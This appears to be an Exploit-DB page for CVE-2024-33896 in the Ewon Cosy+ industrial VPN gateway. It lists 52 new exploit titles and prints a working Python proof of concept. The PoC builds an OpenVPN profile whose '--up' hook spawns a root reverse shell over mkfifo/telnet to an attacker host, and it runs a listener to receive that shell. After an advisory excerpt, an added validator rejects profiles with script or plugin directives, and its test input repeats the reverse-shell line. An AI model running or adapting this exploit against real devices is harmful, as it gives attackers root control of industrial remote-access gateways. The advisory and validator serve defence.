
52 changes to exploits/shellcodes/ghdb

Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection
Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)
Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection
Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)
DataEase 2.4.0 - Database Configuration Information Exposure
Cosy+ firmware 21.2s7 - Command Injection
Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE)
K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)
ABB Cylon Aspect 3.07.02 - File Disclosure (Authenticated)
ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)
ABB Cylon Aspect 3.07.02 - File Disclosure
Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover
CyberPanel 2.3.6 - Remote Code Execution (RCE)
IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow
Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE)
KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR)
MagnusSolution magnusbilling 7.3.0 - Command Injection
Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover
Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass
Sonatype Nexus Repository 3.53.0-01 - Path Traversal
Watcharr 1.43.0 - Remote Code Execution (RCE)
Webmin Usermin 2.100 - Username Enumeration
ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials
ABB Cylon Aspect 3.08.01 - Arbitrary File Delete
AquilaCMS 1.409.20 - Remote Command Execution (RCE)
Artica Proxy 4.50 - Remote Code Execution (RCE)
Centron 19.04 - Remote Code Execution (RCE)
ChurchCRM 5.9.1 - SQL Injection
CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS)
CodeCanyon RISE CRM 3.7.0 - SQL Injection
Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS
Feng Office 3.11.1.2 - SQL Injection
flatCore 1.5 - Cross Site Request Forgery (CSRF)
flatCore 1.5.5 - Arbitrary File Upload
GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)
Gnuboard5 5.3.2.8 - SQL Injection
LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection
Litespeed Cache 6.5.0.1 - Authentication Bypass
MiniCMS 1.1 - Cross Site Scripting (XSS)
MoziloCMS 3.0 - Remote Code Execution (RCE)
NEWS-BUZZ News Management System 1.0 - SQL Injection
PandoraFMS 7.0NG.772 - SQL Injection
phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)
PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF)
ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)
RosarioSIS 7.6 - SQL Injection
Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS)
Typecho 1.3.0 - Race Condition
Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)
X2CRM 8.5 - Stored Cross-Site Scripting (XSS)
Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)
Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure
51 lines, No EOL, 2.2 KiB, Python, Executable file
# Exploit Title: Cosy+ firmware 21.2s7 - Command Injection
# Google Dork: N/A
# Date: 2024-8-20
# Exploit Author: CodeB0ss
# Contact: t.me/codeb0ss / uncodeboss@gmail.com
# Version: 21.2s7
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-33896

import socket
import threading
import time


def configcreator(file_path, attacker_ip):
    # Write the OpenVPN profile that gets uploaded to the device. OpenVPN on
    # the device runs as root and executes the "--up" hook once the tunnel
    # comes up; "script-security 2" is what permits user-defined scripts.
    # The hook opens a reverse shell to the attacker through a mkfifo/telnet
    # pipe on port 5000. Uploading the profile is not automated here.
    with open(file_path, 'w') as f:
        f.write(f"""client
dev tun
persist-tun
proto tcp
verb 5
mute 20
--up '/bin/sh -c "TF=$(mktemp -u);mkfifo $TF;telnet {attacker_ip} 5000 0<$TF | sh 1>$TF"'
script-security 2
""")


def l3st(port):
    # Reverse-shell listener: accept one connection and print what comes back.
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind(('0.0.0.0', port))
    server_socket.listen(1)
    print(f" - --> Listening_0n_port {port}")
    client_socket, _ = server_socket.accept()
    print(" - --> Received")
    while True:
        data = client_socket.recv(1024)
        if not data:
            break
        print(data.decode())
    client_socket.close()
    server_socket.close()


if __name__ == "__main__":
    IP = '127.0.0.1'  # attacker IP the device connects back to; set to your host
    config = '/path/to/malicious_config.ovpn'
    port = 5000
    # The original spawned a second interpreter that imported "start_listener"
    # from a module named "main", neither of which existed in this file; the
    # listener now runs in a background thread of this process.
    threading.Thread(target=l3st, args=(port,)).start()
    time.sleep(2)
    configcreator(config, IP)
    print(f" - --> config_created {config}")

GitHub:
https://github.com/codeb0ss/CVE-2024-33896-PoC

Hey,

Overview: The Ewon Cosy+ is a VPN gateway used for remote access and
maintenance in industrial environments. The manufacturer describes the
product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure
VPN connection between the machine (PLC, HMI, or other devices) and the
remote engineer. The connection happens through Talk2m, a highly secured
industrial cloud service. The Ewon Cosy+ makes industrial remote access
easy and secure like never before!" Due to improper neutralization of
parameters read from a user-controlled configuration file, an authenticated
attacker is able to inject and execute OS commands on the device.

Vulnerability Details: Authenticated attackers are able to upload a custom
OpenVPN configuration. This configuration can contain the OpenVPN
parameters "--up" and "--down", which execute a specified script or
executable. Since the process itself runs with the highest privileges
(root), this allows the device to be completely compromised.
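The check the advisory implies was missing, as an added example (this is not code from the Exploit-DB entry, from CodeB0ss's PoC, or from the vendor): before an uploaded OpenVPN profile is handed to the OpenVPN process, walk its directives and refuse any that execute an external program or load a plugin. The directive names are OpenVPN's script and plugin hooks; the parsing mirrors OpenVPN's config syntax (comments, <tag> inline blocks, and the optional "--" prefix that OpenVPN also tolerates inside config files, which is exactly how the PoC spells its "--up" line). The two sample profiles, the attacker address 192.0.2.10, and the idea of wiring `is_safe_client_config` into the device's upload handler are constructed for the example; the page does not describe that handler.

```python
# Added example: reject OpenVPN profiles that would execute code.
# Not part of the Exploit-DB entry or the Cosy+ advisory.
import re

# OpenVPN options that run an external program or load a shared object.
# In an untrusted profile each is a code-execution primitive at the
# privilege of the OpenVPN process (root on the device, per the advisory).
SCRIPT_DIRECTIVES = {
    "up", "down", "route-up", "route-pre-down", "ipchange",
    "tls-verify", "auth-user-pass-verify", "client-connect",
    "client-disconnect", "learn-address", "plugin",
}
# Not an executor itself, but "script-security 2" (or 3) is what unlocks
# the hooks above, so an uploaded profile has no business setting it.
LEVEL_DIRECTIVES = {"script-security"}

_INLINE_OPEN = re.compile(r"^<([a-z0-9-]+)>$")


def find_dangerous_directives(config_text):
    """Return [(line_no, directive, raw_line)] for every option that would
    execute code if this text were passed to OpenVPN.

    Handles '#' and ';' comments, a leading '--' on an option (OpenVPN
    strips it in config files as on the command line), and <tag>...</tag>
    inline blocks, whose bodies are certificate/key data, not options.
    """
    findings = []
    inline_tag = None
    for line_no, raw in enumerate(config_text.splitlines(), start=1):
        line = raw.strip()
        if inline_tag is not None:
            if line == f"</{inline_tag}>":
                inline_tag = None
            continue  # inside <ca>/<cert>/<key>: data, not an option
        if not line or line[0] in "#;":
            continue
        m = _INLINE_OPEN.match(line)
        if m:
            inline_tag = m.group(1)
            continue
        name = line.split(None, 1)[0]
        if name.startswith("--"):
            name = name[2:]
        # OpenVPN matches option names case-sensitively; comparing
        # case-insensitively here only makes the gate stricter.
        name = name.lower()
        if name in SCRIPT_DIRECTIVES or name in LEVEL_DIRECTIVES:
            findings.append((line_no, name, raw))
    return findings


def is_safe_client_config(config_text):
    """Accept/reject decision for an upload handler (assumed integration
    point): True only when no directive can cause code execution."""
    return not find_dangerous_directives(config_text)


# Constructed input 1: the profile the PoC above writes, with a sample
# attacker address substituted for {attacker_ip}.
POC_CONFIG = """client
dev tun
persist-tun
proto tcp
verb 5
mute 20
--up '/bin/sh -c "TF=$(mktemp -u);mkfifo $TF;telnet 192.0.2.10 5000 0<$TF | sh 1>$TF"'
script-security 2
"""

# Constructed input 2: an ordinary client profile. The "up" inside the
# <ca> block is certificate data and must not trigger a rejection; the
# commented line must not either.
BENIGN_CONFIG = """client
dev tun
proto udp
remote vpn.example.net 1194
# up scripts are not used by this profile
<ca>
-----BEGIN CERTIFICATE-----
up /this/is/data/not/an/option
-----END CERTIFICATE-----
</ca>
"""

if __name__ == "__main__":
    for label, text in (("PoC profile", POC_CONFIG), ("benign profile", BENIGN_CONFIG)):
        hits = find_dangerous_directives(text)
        print(f"{label}: {'REJECT' if hits else 'accept'}")
        for line_no, name, raw in hits:
            print(f"  line {line_no}: {name}: {raw}")
```

Run as a script it rejects the PoC profile on its "--up" and "script-security" lines and accepts the benign one. A deny-list like this is the minimum; a stricter gate would allow-list the handful of directives a device-generated client profile actually needs and refuse everything else, which also covers hooks added in later OpenVPN releases.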